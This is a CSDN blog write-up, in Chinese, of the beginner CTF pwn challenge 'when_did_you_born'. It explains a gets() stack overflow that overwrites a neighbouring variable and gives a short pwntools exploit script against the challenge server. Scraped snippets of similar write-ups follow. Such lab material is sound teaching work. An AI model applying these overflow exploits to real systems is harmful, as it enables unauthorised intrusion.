when_did_you_born--writeup

最新推荐文章于 2021-03-11 01:15:33 发布
最新推荐文章于 2021-03-11 01:15:33 发布
阅读量515 收藏 4
点赞数 22
分类专栏: CTF-PWN # 攻防世界-pwn -- WriteUp 文章标签: CTF PWN ROP 栈溢出 攻防世界
本文为ATFWUS原创,允许转载,但请附上作者署名和本文链接
本文链接:https://blog.csdn.net/ATFWUS/article/details/104591163
版权

文件下载地址:

链接:https://pan.baidu.com/s/1eT_oVeEKPts8Lw2P0nDEnw
提取码:1axx

0x01.分析

checksec:

64位程序,开启了堆栈保护和栈不可执行。

查看源码:

理清一下流程,先要输入v5,第一次不能输入1926,否则会退出,然后第二次输入名字,然后如果v5等于1926就直接得到flag,第二次输入的时候使用了gets,存在栈溢出,我们需要利用这个在第二次输入来修改v5的值位1926,继续查看一下v4和v5的关系:

相差8个字节,所以我们只需要填充8个字节的无效数据,然后覆盖v5的值为1926就行了。

0x02.exp

##!/usr/bin/env python
from pwn import*
r=remote("111.198.29.45",47185)
#r=process('./when')

payload=8*'A'+p64(1926)

r.recvuntil("?")
r.sendline("1925")
r.recvuntil("?")
r.sendline(payload)
r.interactive()

 

ATFWUS
关注
  • 22
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
空指针-Base_on_windows_Writeup--最新版DZ3.4实战渗透1
08-03
2、我们获得了一份 config 文件,里面有最重要的 authkey 2、dz 有正常的备份数据,备份数据里有重要的 key 值 1、配合报错注入的攻击链 2
Coursera-Prediction_Assignment_Writeup-1
02-24
Prediction_Assignment_Writeup 同行评分作业:预测作业撰写 ##指示 人们经常做的一件事是量化他们从事某项特定活动的数量,但是他们很少量化他们做某件事的程度。 在此项目中,您的目标是使用来自6位参与者的皮带,前臂,手臂和哑铃上的加速度计的数据。 ##无条件审查###您应提交的内容 您的项目的目标是预测他们进行练习的方式。 这是训练集中的“ classe”变量。 您可以使用任何其他变量进行预测。 您应该创建一个报告,描述如何构建模型,如何使用交叉验证,您认为预期的样本外错误是什么以及做出选择的原因。 您还将使用预测模型来预测20个不同的测试用例。 ##同行评论部分 您提交给同行评审的部分应包括指向Github存储库的链接,其中包含您的R降价标记和描述分析的已编译HTML文件。 请限制撰写文章的文本少于2000个单词,并且图形的数量应少于5个。如果您通过gh-
FISTA-master.zip_FISTA-master_FISTA、ISTA_Starting With June_fist
07-15
FISTA My implementation of an Fast Iterative Shrinkage Thresholding Algorithm on MATLAB. Based on the implementation discussed in: Beck, Amir, and Marc Teboulle. Fast Gradient-Based Algorithms for Constrained Total Variation Image Denoising and Deblurring Problems - IEEE Xplore Document. N.p., 11 June 2009. Web. 20 Apr. 2017. Beck, Amir, and Marc Teboulle. "A Fast Iterative Shrinkage-Thresholding Algorithm for Linear Inverse Problems." SIAM Journal on Imaging Sciences 2.1 (2009): 183-202. Web. Project was done during BME593 - Computational Methods for Inverse Problems. The MATLAB functions and files starting with tp as well as project_test and ISTA_test were implemented by me. The data and other files were implemented by the TAs in the class. To initiate the FISTA algorithm on the given data set, please run project_test. The details of the implementation, as well as discussions of the technique can be found in project_writeup.pdf.
2020-HackIM_ctf_hackim-ctfwriteup_
09-28
这是hackim-ctf的writeup
ReverseRSA_writeup_rsa_appprivatekey_解密_
09-29
一个WriteUp,尝试从部分私钥中解密RSA加密的数据
[PWN](攻防世界)when_did_you_born
ljh15937的博客
09-17 177
分析程序漏洞 通过 checksec 获取程序的基本信息 64位小端序 开启了Canary,使用了栈不可执行技术 使用 IDA Pro 对程序进行静态分析 需要在第二次输入名字时覆盖第一次输入的年龄 使用 GDB 动态调试程序 可以发现第二次输入的名字就在第一次输入的年龄的前面,可以轻松将其覆盖成 1926 利用程序 from pwn import * context(arch = 'amd64') context(log_level = 'DEBUG') contex
[CTF-PWN]攻防世界新手村-when_did_you_born[wp]
murongxuege的博客
09-29 607
事件起因(无语) 手残博主因在27日从根地址误删了自己两年半配置和使用的kali虚拟机。。。在一步步恢复环境配置的时候,从头到尾刷一遍题,总结思路。 题目分析 开启场景后,服务端会开启对应的端口,并在端口上部署和附件相同的ELF二进制可执行文件,我们要做的就是下载附件并在本地进行反汇编,反编译等操作分析程序漏洞,从而利用漏洞获取题目的flag。 从描述中可以看出当前程序是要进行年龄的输入操作的,有输入操作,还是在新手村,那么大概率是gets()等C函数输入漏洞,进一步猜测是普通的内存地址覆盖的题。 che
pwn when_did_you_born
doudoudedi
06-08 508
今天被一道被一道web给虐暴了自闭中~~~~~ 所以我做到pwn来缓缓 用ida打开只要v5=1926 就可以看flag 但按照前面的逻辑不可以等于所以 就涉及到了溢出 gets()这个很普遍了吧 直接算出偏移为8 然后就上exp咯 from pwn import * p=remote('111.198.29.45',56377) payload='a'*8+p64(1926) p.recvunt...
攻防世界_pwn_when_did_you_born(萌新版)
TedLau的博客
02-24 204
首发于鄙人博客:传送门 0x00 前言 省略file checksec,这个题的意思就是让我们输入的第二个值覆盖并改变我们输入的第一个值。 0x10 步骤 0x11 main函数 在main函数中我们可以发现题目要求我们输入Birth,若我们输入的值为1926,那么程序便会直接退出,若我们输入的不是1926,那么就会进入else中,而在else中,如果我们想cat flag,那么...
攻防世界when_did_you_born
Deeeelete的博客
11-12 181
题目:when_did_you_born 拖进pe查看文件详情 checksec查看 无PIE,堆栈不可执行,栈保护 运行跑一遍逻辑 进64位IDA调试 f5反编译main函数 得到源码 __int64 __fastcall main(__int64 a1, char **a2, char **a3) { __int64 result; // rax@4 __int64 v4; // rdx@9 char v5; // [sp+0h] [bp-20h]@5 unsig
python3的pwn用法——when_did_you_born题解
Little_Small_Joze的博客
03-11 1666
检测截图 file when_did_you_born checksec when_did_you_born 我承认看到金丝雀+NX有那么一点点不开心,但是不影响。 反编译程序 根据上一步的file查看到它是64-bits的ELF文件,所以64-bits的IDA打开它,反编译找到主函数F5查看源代码。 __int64 __fastcall main(int a1, char **a2, char **a3) { __int64 result; // rax char v4[8]; // [rs
when_did_you_born [XCTF-PWN]CTF writeup系列3
重新启程
12-19 410
题目地址:when_did_you_born 先检查一下保护机制 root@mypwn:/ctf/work/python# checksec 24937e95ca4744818feebe82ab96902d [*] '/ctf/work/python/24937e95ca4744818feebe82ab96902d' Arch: amd64-64-little ...
攻防世界pwn when_did_you_born(栈溢出)
Haowill的博客
04-09 488
攻防世界pwn when_did_you_born(栈溢出) 这是我第一次写博客,希望帮助到大家,感谢大家的支持。 pwn题做题步骤 相信做这道题的同学们都是新手,或者是老手回来刷题。所以我这里会简单介绍我做pwn题的方法。 一、下载程序到电脑 这个就是下载到电脑里的样子。 二、判断程序类型 这个程序没有.exe后缀,所以它不是window的,它是linux的。在我们学习pwn的初期都是linux...
sctf-when_did_you_born
just do IT
07-09 721
IDA : 思路: 输入v5 (不等于1926),, 通过v4 覆盖到v5 使其等于1926. 可以看出偏移为2 from pwn import * #sh = process('./when_did_you_born') sh = remote('111.198.29.45',52538) sh.recv() sh.sendline('1925') payload = 'AAaaaaaa'...
when_did_you_born(xctf)
weixin_43868725的博客
05-06 204
0x0 程序保护和流程 保护: 流程: 分析主要程序逻辑可知,要想获得flag必须让v5等于1926但是第一次输入时v5不能等于1925。但是我们可以通过gets(&v4)将v5的值覆盖成1926。 0x1 利用过程 v4变量距离rsp的偏移为0x0,v5变量距离rsp的变量为0x8,所以当v4=‘a’*8+p64(1926)时就可以获得flag。 0x2 exp from pwn i...
when_did_you_born 栈溢出简单利用
zyh18851473527的博客
08-05 572
直接放到IDA里看下: 显而易见只要v5=1926,就可以看flag。但按照前面的逻辑不可以等于所以 就涉及到了溢出。gets函数溢出,这道题关键v5一开始不为1926,后面必须是1926,所以通过栈可以知道,用v4覆盖v5 下面利用缓冲区溢出,先输入v4字符串覆盖空间,然后再给v5赋值1926就好了,试试看,从ebp的偏移可以看出来v4距离v5需要覆盖8个字节 这样就得到flag啦 ...
攻防世界 when_did_you_born
09-28 242
1.题目 2.IDA反汇编C程序 3.程序流程分析 首先输入Birth,如果Birth==1926直接退出;否则,输入Name,这时,判断Birth是否==1926.等于则get flag。 很明显,输入名字就是专门为我们提供溢出点的。两个变量的位置如下图: 0x20 - 0x18 = 0x8 也就是说name和birth之间间距8个单元。exp如下 from pwn import * #io = process('./when_did_you_born') io = remo
[攻防世界 pwn]——when_did_you_born
Y_peak的博客
02-18 107
[攻防世界 pwn]——when_did_you_born
攻防世界 - pwn - when_did_you_born
qq726232111的博客
03-16 167
A、程序分析 1、gets( 0 , rbp-20h ) -> rbp-20h 为缓冲区起始地址 2、[rbp-18h] ==786h -> 执行cat flag B、利用分析 1、构造payload通过gets()覆盖rbp-18h的内容 payload: 20h-19h(填充数据) + 18h-15h(0x0000786,判断条件) ...
oscp 2023 challenge writeup-medtech-csdn博客
最新发布
10-29
OSCP 2023 Challenge Writeup-MedTech-CSDN博客是一个关于OSCP挑战赛的技术解析博客。在这篇博客中,作者详细讲解了一个名为MedTech的挑战项目,并提供了解决该挑战所需的步骤和工具。 这篇博客的开头介绍了OSCP...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

ATFWUS

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值